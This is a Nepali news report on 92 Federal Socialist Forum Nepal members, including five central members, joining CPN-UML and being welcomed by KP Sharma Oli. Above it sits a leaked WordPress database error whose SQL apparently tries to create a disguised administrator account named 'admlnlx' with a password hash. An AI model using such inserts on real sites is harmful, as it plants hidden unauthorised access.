WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bh93DHmBurOGI3WSLQ7NkHroobCCQf1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:34:41', '', 'admlnlx', 'admlnlx')
काठमाडौं,मंसिर २३-
उपेन्द्र यादव नेतृत्वको संघीय समाजवादी फोरम नेपालका ५ केन्द्रीय सदस्यसहित ९२ जना नेकपा एमालेमा प्रवेश गरेका छन् ।
नवप्रवेशीलाई विहिबार एमाले पार्टी कार्यालय धुम्बाराहीमा आयोजित पार्टी प्रवेश कार्यक्रममा अध्यक्ष केपी शर्मा ओलीले खादा र टिका लगाएर स्वागत गरे ।स्वागत समारोहमा अध्यक्ष ओलीले नवप्रवेशीलाई उचित जिम्मेवारी दिइने बताए । ‘पार्टीले उहाँलाई उचित जिम्मेवारी दिनुपर्छ । अब सम्पूर्ण नेता कार्यकर्ता निर्वाचनमा केन्द्रीत हुनुपर्छ,’ ओलीले भने ।
प्रचार विभाग उपप्रमुख सूर्य थापाका अनुसार एमाले प्रवेश गर्नेमा फोरम नेपालका केन्द्रीय सदस्यहरु विरेन्द्रबहादुर बोगटी, टोपबहादुर ओली, प्रकाश अधिकारी, ओमकृष्ण प्रसाईँ, राजेन्द्रप्रसाद खनाल सहित ९२ जना छन् ।यस्तै, खेलकुद विभागका सचिव सुकदेव चाम्लिङ, रक्तिम सांस्कृतिक परिवारका केन्द्रीय सदस्य छविलाल राहुमगर र संघीय प्रेस फोरमका वरिष्ठ उपाध्यक्ष पनि एमाले प्रवेश गरेका छन् ।
कार्यक्रममा नवप्रवेशीले राष्ट्रियताको पक्षमा एमालेको अडानले आफूहरु प्रभावित भएको र त्यसैकारण पार्टी प्रवेश गरेको बताएका थिए ।
पार्टी प्रवेश कार्यक्रममा ओलीसहित महासचिव ईश्वर पोखरेल, केन्द्रीय सचिवालय सचिव प्रदीप ज्ञवाली र केन्द्रीय प्रचार विभाग प्रमुख योगेश भट्टराई लगायत नेता तथा कार्यकर्ताको बाक्लो उपस्थिति रहेको थियो ।